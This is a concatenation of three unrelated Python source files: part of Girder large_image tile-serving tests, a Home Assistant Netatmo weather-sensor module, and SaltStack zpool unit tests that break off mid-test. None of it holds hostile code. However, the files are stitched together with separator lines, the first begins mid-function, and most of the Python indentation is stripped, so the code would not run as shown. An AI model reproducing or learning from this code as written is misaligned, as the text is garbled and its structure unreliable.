# Test tile sizes
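    # With a tile size of 256 and an overlap of 4, tiles gain 4 pixels per
    # interior edge: corner tiles are 260 pixels on the overlapped sides,
    # interior tiles 264, and tiles on the right/bottom edge can be smaller.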
resp = server.request(path='/item/%s/tiles/dzi_files/12/0_0.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 260
assert height == 260
resp = server.request(path='/item/%s/tiles/dzi_files/12/0_1.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 260
assert height == 264
resp = server.request(path='/item/%s/tiles/dzi_files/12/2_1.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 264
assert height == 264
resp = server.request(path='/item/%s/tiles/dzi_files/12/14_2.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 68
assert height == 260
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesAfterCopyItem(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
item = Item().load(itemId, force=True)
newItem = Item().copyItem(item, admin)
assert item['largeImage']['fileId'] != newItem['largeImage']['fileId']
Item().remove(item)
_testTilesZXY(boundServer, admin, str(newItem['_id']), tileMetadata)
@pytest.mark.plugin('large_image')
def testTilesAutoSetOption(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore,
name='sample_image.PTIF')
itemId = str(file['itemId'])
# We should already have tile information.
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
# Turn off auto-set and try again
Setting().set(constants.PluginSettings.LARGE_IMAGE_AUTO_SET, 'false')
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# Turn it back on
Setting().set(constants.PluginSettings.LARGE_IMAGE_AUTO_SET, 'true')
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesAssociatedImages(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles/images' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
    assert resp.json == ['label', 'macro']
resp = server.request(path='/item/%s/tiles/images/label' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
resp = server.request(
path='/item/%s/tiles/images/label' % itemId, user=admin,
isJson=False, params={'encoding': 'PNG', 'width': 256, 'height': 256})
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert max(width, height) == 256
# Test missing associated image
resp = server.request(path='/item/%s/tiles/images/nosuchimage' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image == b''
# Test with an image that doesn't have associated images
file = utilities.uploadExternalFile(
'data/sample_Easy1.png.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, method='POST', user=admin)
assert utilities.respStatus(resp) == 200
resp = server.request(path='/item/%s/tiles/images' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json == []
resp = server.request(path='/item/%s/tiles/images/nosuchimage' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image == b''
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesWithFrameNumbers(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample.ome.tif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
# Test that we can get frames via either tiles/zxy or tiles/fzxy and
# that the frames are different
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image0 = utilities.getBody(resp, text=False)
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False, params={'frame': 0})
assert utilities.respStatus(resp) == 200
assert utilities.getBody(resp, text=False) == image0
resp = server.request(path='/item/%s/tiles/fzxy/0/0/0/0' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
assert utilities.getBody(resp, text=False) == image0
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False, params={'frame': 1})
assert utilities.respStatus(resp) == 200
image1 = utilities.getBody(resp, text=False)
assert image1 != image0
resp = server.request(path='/item/%s/tiles/fzxy/1/0/0/0' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
assert utilities.getBody(resp, text=False) == image1
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesHistogram(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(
path='/item/%s/tiles/histogram' % itemId,
params={'width': 2048, 'height': 2048, 'resample': False})
assert len(resp.json) == 3
assert len(resp.json[0]['hist']) == 256
assert resp.json[1]['samples'] == 2801664
assert resp.json[1]['hist'][128] == 176
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesInternalMetadata(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles/internal_metadata' % itemId)
assert resp.json['tilesource'] == 'tiff'
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromMultipleDotName(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile(
'yb10kx5k.png', admin, fsAssetstore, name='A name with...dots.png')
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
assert tileMetadata['magnification'] is None
assert tileMetadata['mm_x'] is None
assert tileMetadata['mm_y'] is None
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesForcedConversion(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadExternalFile(
'data/landcover_sample_1000.tif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
# We should already have tile information. Ask to delete it so we can
# force convert it
boundServer.request(path='/item/%s/tiles' % itemId, method='DELETE', user=admin)
# Ask to do a forced conversion
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, None, data={'force': True})
assert tileMetadata['levels'] == 3
item = Item().load(itemId, force=True)
assert item['largeImage']['fileId'] != fileId
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromWithOptions(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId, data={'tileSize': 1024})
assert tileMetadata['tileWidth'] == 1024
assert tileMetadata['tileHeight'] == 1024
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 5
|
|
"""
Support for the NetAtmo Weather Service.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.netatmo/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
from homeassistant.loader import get_component
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MODULE = 'modules'
CONF_MODULES = 'modules'
CONF_STATION = 'station'
DEPENDENCIES = ['netatmo']
# NetAtmo Data is uploaded to server every 10 minutes
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=600)
SENSOR_TYPES = {
'temperature': ['Temperature', TEMP_CELSIUS, 'mdi:thermometer'],
'co2': ['CO2', 'ppm', 'mdi:cloud'],
'pressure': ['Pressure', 'mbar', 'mdi:gauge'],
'noise': ['Noise', 'dB', 'mdi:volume-high'],
'humidity': ['Humidity', '%', 'mdi:water-percent'],
'rain': ['Rain', 'mm', 'mdi:weather-rainy'],
'sum_rain_1': ['sum_rain_1', 'mm', 'mdi:weather-rainy'],
'sum_rain_24': ['sum_rain_24', 'mm', 'mdi:weather-rainy'],
'battery_vp': ['Battery', '', 'mdi:battery'],
'min_temp': ['Min Temp.', TEMP_CELSIUS, 'mdi:thermometer'],
'max_temp': ['Max Temp.', TEMP_CELSIUS, 'mdi:thermometer'],
'WindAngle': ['Angle', '', 'mdi:compass'],
'WindStrength': ['Strength', 'km/h', 'mdi:weather-windy'],
'GustAngle': ['Gust Angle', '', 'mdi:compass'],
'GustStrength': ['Gust Strength', 'km/h', 'mdi:weather-windy'],
'rf_status': ['Radio', '', 'mdi:signal'],
'wifi_status': ['Wifi', '', 'mdi:wifi']
}
MODULE_SCHEMA = vol.Schema({
vol.Required(cv.string, default=[]):
vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_STATION): cv.string,
vol.Optional(CONF_MODULES): MODULE_SCHEMA,
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the available Netatmo weather sensors."""
netatmo = get_component('netatmo')
data = NetAtmoData(netatmo.NETATMO_AUTH, config.get(CONF_STATION, None))
dev = []
import lnetatmo
try:
if CONF_MODULES in config:
# Iterate each module
for module_name, monitored_conditions in\
config[CONF_MODULES].items():
                # Test if the module exists
if module_name not in data.get_module_names():
_LOGGER.error('Module name: "%s" not found', module_name)
continue
                # Only create sensors for monitored conditions
for variable in monitored_conditions:
dev.append(NetAtmoSensor(data, module_name, variable))
else:
for module_name in data.get_module_names():
for variable in\
data.station_data.monitoredConditions(module_name):
dev.append(NetAtmoSensor(data, module_name, variable))
except lnetatmo.NoDevice:
return None
add_devices(dev)
class NetAtmoSensor(Entity):
"""Implementation of a Netatmo sensor."""
def __init__(self, netatmo_data, module_name, sensor_type):
"""Initialize the sensor."""
self._name = 'Netatmo {} {}'.format(module_name,
SENSOR_TYPES[sensor_type][0])
self.netatmo_data = netatmo_data
self.module_name = module_name
self.type = sensor_type
self._state = None
self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]
module_id = self.netatmo_data.\
station_data.moduleByName(module=module_name)['_id']
self._unique_id = "Netatmo Sensor {0} - {1} ({2})".format(self._name,
module_id,
self.type)
self.update()
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unique_id(self):
"""Return the unique ID for this sensor."""
return self._unique_id
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return SENSOR_TYPES[self.type][2]
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
def update(self):
"""Get the latest data from NetAtmo API and updates the states."""
self.netatmo_data.update()
data = self.netatmo_data.data[self.module_name]
if self.type == 'temperature':
self._state = round(data['Temperature'], 1)
elif self.type == 'humidity':
self._state = data['Humidity']
elif self.type == 'rain':
self._state = data['Rain']
elif self.type == 'sum_rain_1':
self._state = data['sum_rain_1']
elif self.type == 'sum_rain_24':
self._state = data['sum_rain_24']
elif self.type == 'noise':
self._state = data['Noise']
elif self.type == 'co2':
self._state = data['CO2']
elif self.type == 'pressure':
self._state = round(data['Pressure'], 1)
elif self.type == 'battery_vp':
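            # Map the reported battery voltage to a qualitative level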
if data['battery_vp'] >= 5500:
self._state = "Full"
elif data['battery_vp'] >= 5100:
self._state = "High"
elif data['battery_vp'] >= 4600:
self._state = "Medium"
elif data['battery_vp'] >= 4100:
self._state = "Low"
elif data['battery_vp'] < 4100:
self._state = "Very Low"
elif self.type == 'min_temp':
self._state = data['min_temp']
elif self.type == 'max_temp':
self._state = data['max_temp']
elif self.type == 'WindAngle':
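            # Convert the wind angle in degrees to a compass direction label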
if data['WindAngle'] >= 330:
self._state = "North (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 300:
self._state = "North-West (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 240:
self._state = "West (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 210:
self._state = "South-West (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 150:
self._state = "South (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 120:
self._state = "South-East (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 60:
self._state = "East (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 30:
self._state = "North-East (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 0:
self._state = "North (%d\xb0)" % data['WindAngle']
elif self.type == 'WindStrength':
self._state = data['WindStrength']
elif self.type == 'GustAngle':
if data['GustAngle'] >= 330:
self._state = "North (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 300:
self._state = "North-West (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 240:
self._state = "West (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 210:
self._state = "South-West (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 150:
self._state = "South (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 120:
self._state = "South-East (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 60:
self._state = "East (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 30:
self._state = "North-East (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 0:
self._state = "North (%d\xb0)" % data['GustAngle']
elif self.type == 'GustStrength':
self._state = data['GustStrength']
elif self.type == 'rf_status':
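            # Lower rf_status values indicate a stronger radio link to the station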
if data['rf_status'] >= 90:
self._state = "Low"
elif data['rf_status'] >= 76:
self._state = "Medium"
elif data['rf_status'] >= 60:
self._state = "High"
elif data['rf_status'] <= 59:
self._state = "Full"
elif self.type == 'wifi_status':
if data['wifi_status'] >= 86:
self._state = "Bad"
elif data['wifi_status'] >= 71:
self._state = "Middle"
elif data['wifi_status'] <= 70:
self._state = "Good"
class NetAtmoData(object):
"""Get the latest data from NetAtmo."""
def __init__(self, auth, station):
"""Initialize the data object."""
self.auth = auth
self.data = None
self.station_data = None
self.station = station
def get_module_names(self):
"""Return all module available on the API as a list."""
self.update()
return self.data.keys()
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Call the Netatmo API to update the data."""
import lnetatmo
self.station_data = lnetatmo.DeviceList(self.auth)
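        # exclude=3600 asks lnetatmo to skip modules whose last measurement
        # is older than an hour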
if self.station is not None:
self.data = self.station_data.lastData(station=self.station,
exclude=3600)
else:
self.data = self.station_data.lastData(exclude=3600)
|
|
"""
Tests for salt.modules.zpool
:codeauthor: Nitin Madhok <[email protected]>, Jorge Schrauwen <[email protected]>
:maintainer: Jorge Schrauwen <[email protected]>
:maturity: new
:depends: salt.utils.zfs
:platform: illumos,freebsd,linux
"""
import pytest
import salt.loader
import salt.modules.zpool as zpool
import salt.utils.decorators
import salt.utils.decorators.path
import salt.utils.zfs
from salt.utils.odict import OrderedDict
from tests.support.mock import MagicMock, patch
from tests.support.zfs import ZFSMockData
@pytest.fixture
def utils_patch():
return ZFSMockData().get_patched_utils()
@pytest.fixture
def configure_loader_modules():
opts = salt.config.DEFAULT_MINION_OPTS.copy()
utils = salt.loader.utils(
opts, whitelist=["zfs", "args", "systemd", "path", "platform"]
)
zpool_obj = {zpool: {"__opts__": opts, "__utils__": utils}}
return zpool_obj
@pytest.mark.slow_test
def test_exists_success(utils_patch):
"""
Tests successful return of exists function
"""
ret = {}
ret["stdout"] = (
"NAME SIZE ALLOC FREE CAP DEDUP HEALTH ALTROOT\n"
"myzpool 149G 128K 149G 0% 1.00x ONLINE -"
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
assert zpool.exists("myzpool")
@pytest.mark.slow_test
def test_exists_failure(utils_patch):
"""
Tests failure return of exists function
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'myzpool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
assert not zpool.exists("myzpool")
def test_healthy(utils_patch):
"""
Tests successful return of healthy function
"""
ret = {}
ret["stdout"] = "all pools are healthy"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
assert zpool.healthy()
def test_status(utils_patch):
"""
Tests successful return of status function
"""
ret = {}
ret["stdout"] = "\n".join(
[
" pool: mypool",
" state: ONLINE",
" scan: scrub repaired 0 in 0h6m with 0 errors on Mon Dec 21 02:06:17"
" 2015",
"config:",
"",
"\tNAME STATE READ WRITE CKSUM",
"\tmypool ONLINE 0 0 0",
"\t mirror-0 ONLINE 0 0 0",
"\t c2t0d0 ONLINE 0 0 0",
"\t c2t1d0 ONLINE 0 0 0",
"",
"errors: No known data errors",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.status()
assert "ONLINE" == ret["mypool"]["state"]
def test_status_with_colons_in_vdevs(utils_patch):
"""
Tests successful return of status function
"""
ret = {}
ret["stdout"] = "\n".join(
[
" pool: mypool",
" state: ONLINE",
" scan: scrub repaired 0 in 0h6m with 0 errors on Mon Dec 21 02:06:17"
" 2015",
"config:",
"",
"\tNAME STATE READ WRITE CKSUM",
"\tmypool ONLINE 0 0 0",
"\t mirror-0 ONLINE 0 0 0",
"\t usb-WD_My_Book_Duo_25F6_....32-0:0 ONLINE 0 0 0",
"\t usb-WD_My_Book_Duo_25F6_....32-0:1 ONLINE 0 0 0",
"",
"errors: No known data errors",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.status()
assert "ONLINE" == ret["mypool"]["state"]
@pytest.mark.slow_test
def test_iostat(utils_patch):
"""
Tests successful return of iostat function
"""
ret = {}
ret["stdout"] = "\n".join(
[
" capacity operations bandwidth",
"pool alloc free read write read write",
"---------- ----- ----- ----- ----- ----- -----",
"mypool 46.7G 64.3G 4 19 113K 331K",
" mirror 46.7G 64.3G 4 19 113K 331K",
" c2t0d0 - - 1 10 114K 334K",
" c2t1d0 - - 1 10 114K 334K",
"---------- ----- ----- ----- ----- ----- -----",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.iostat("mypool", parsable=False)
assert "46.7G" == ret["mypool"]["capacity-alloc"]
def test_iostat_parsable(utils_patch):
"""
Tests successful return of iostat function
    .. note::
        The command output is the same as the non-parsable one!
There is no -p flag for zpool iostat, but our type
conversions can handle this!
"""
ret = {}
ret["stdout"] = "\n".join(
[
" capacity operations bandwidth",
"pool alloc free read write read write",
"---------- ----- ----- ----- ----- ----- -----",
"mypool 46.7G 64.3G 4 19 113K 331K",
" mirror 46.7G 64.3G 4 19 113K 331K",
" c2t0d0 - - 1 10 114K 334K",
" c2t1d0 - - 1 10 114K 334K",
"---------- ----- ----- ----- ----- ----- -----",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.iostat("mypool", parsable=True)
assert 50143743180 == ret["mypool"]["capacity-alloc"]
def test_list(utils_patch):
"""
Tests successful return of list function
"""
ret = {}
ret["stdout"] = "mypool\t1.81T\t661G\t1.17T\t35%\t11%\tONLINE"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.list_(parsable=False)
res = OrderedDict(
[
(
"mypool",
OrderedDict(
[
("size", "1.81T"),
("alloc", "661G"),
("free", "1.17T"),
("cap", "35%"),
("frag", "11%"),
("health", "ONLINE"),
]
),
)
]
)
assert ret == res
@pytest.mark.slow_test
def test_list_parsable(utils_patch):
"""
Tests successful return of list function with parsable output
"""
ret = {}
ret["stdout"] = "mypool\t1.81T\t661G\t1.17T\t35%\t11%\tONLINE"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.list_(parsable=True)
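    # Sizes are converted to bytes, e.g. int(1.81 * 2 ** 40) == 1990116046274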
res = OrderedDict(
[
(
"mypool",
OrderedDict(
[
("size", 1990116046274),
("alloc", 709743345664),
("free", 1286428604497),
("cap", "35%"),
("frag", "11%"),
("health", "ONLINE"),
]
),
)
]
)
assert ret == res
def test_get(utils_patch):
"""
Tests successful return of get function
"""
ret = {}
ret["stdout"] = "mypool\tsize\t1.81T\t-\n"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.get("mypool", "size", parsable=False)
res = OrderedDict(OrderedDict([("size", "1.81T")]))
assert ret == res
@pytest.mark.slow_test
def test_get_parsable(utils_patch):
"""
Tests successful return of get function with parsable output
"""
ret = {}
ret["stdout"] = "mypool\tsize\t1.81T\t-\n"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.get("mypool", "size", parsable=True)
res = OrderedDict(OrderedDict([("size", 1990116046274)]))
assert ret == res
@pytest.mark.slow_test
def test_get_whitespace(utils_patch):
"""
Tests successful return of get function with a string with whitespaces
"""
ret = {}
ret["stdout"] = "mypool\tcomment\tmy testing pool\t-\n"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.get("mypool", "comment")
res = OrderedDict(OrderedDict([("comment", "my testing pool")]))
assert ret == res
@pytest.mark.slow_test
def test_scrub_start(utils_patch):
"""
Tests start of scrub
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
mock_exists = MagicMock(return_value=True)
with patch.dict(zpool.__salt__, {"zpool.exists": mock_exists}), patch.dict(
zpool.__salt__, {"cmd.run_all": mock_cmd}
), patch.dict(zpool.__utils__, utils_patch):
ret = zpool.scrub("mypool")
res = OrderedDict(OrderedDict([("scrubbing", True)]))
assert ret == res
@pytest.mark.slow_test
def test_scrub_pause(utils_patch):
"""
Tests pause of scrub
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
mock_exists = MagicMock(return_value=True)
with patch.dict(zpool.__salt__, {"zpool.exists": mock_exists}), patch.dict(
zpool.__salt__, {"cmd.run_all": mock_cmd}
), patch.dict(zpool.__utils__, utils_patch):
ret = zpool.scrub("mypool", pause=True)
res = OrderedDict(OrderedDict([("scrubbing", False)]))
assert ret == res
@pytest.mark.slow_test
def test_scrub_stop(utils_patch):
"""
    Tests stop of scrub
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
mock_exists = MagicMock(return_value=True)
with patch.dict(zpool.__salt__, {"zpool.exists": mock_exists}), patch.dict(
zpool.__salt__, {"cmd.run_all": mock_cmd}
), patch.dict(zpool.__utils__, utils_patch):
ret = zpool.scrub("mypool", stop=True)
res = OrderedDict(OrderedDict([("scrubbing", False)]))
assert ret == res
def test_split_success(utils_patch):
"""
Tests split on success
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.split("datapool", "backuppool")
res = OrderedDict([("split", True)])
assert ret == res
@pytest.mark.slow_test
def test_split_exist_new(utils_patch):
"""
    Tests split when the new pool already exists
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "Unable to split datapool: pool already exists"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.split("datapool", "backuppool")
res = OrderedDict(
[
("split", False),
("error", "Unable to split datapool: pool already exists"),
]
)
assert ret == res
def test_split_missing_pool(utils_patch):
"""
Tests split on missing source pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'datapool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.split("datapool", "backuppool")
res = OrderedDict(
[("split", False), ("error", "cannot open 'datapool': no such pool")]
)
assert ret == res
@pytest.mark.slow_test
def test_split_not_mirror(utils_patch):
"""
Tests split on source pool is not a mirror
"""
ret = {}
ret["stdout"] = ""
ret[
"stderr"
] = "Unable to split datapool: Source pool must be composed only of mirrors"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.split("datapool", "backuppool")
res = OrderedDict(
[
("split", False),
(
"error",
"Unable to split datapool: Source pool must be composed only of"
" mirrors",
),
]
)
assert ret == res
def test_labelclear_success(utils_patch):
"""
Tests labelclear on successful label removal
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.labelclear("/dev/rdsk/c0t0d0", force=False)
res = OrderedDict([("labelcleared", True)])
assert ret == res
def test_labelclear_nodevice(utils_patch):
"""
Tests labelclear on non existing device
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "failed to open /dev/rdsk/c0t0d0: No such file or directory"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.labelclear("/dev/rdsk/c0t0d0", force=False)
res = OrderedDict(
[
("labelcleared", False),
(
"error",
"failed to open /dev/rdsk/c0t0d0: No such file or directory",
),
]
)
assert ret == res
def test_labelclear_cleared(utils_patch):
"""
Tests labelclear on device with no label
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "failed to read label from /dev/rdsk/c0t0d0"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.labelclear("/dev/rdsk/c0t0d0", force=False)
res = OrderedDict(
[
("labelcleared", False),
("error", "failed to read label from /dev/rdsk/c0t0d0"),
]
)
assert ret == res
def test_labelclear_exported(utils_patch):
"""
    Tests labelclear on a device from an exported pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "\n".join(
[
"use '-f' to override the following error:",
'/dev/rdsk/c0t0d0 is a member of exported pool "mypool"',
]
)
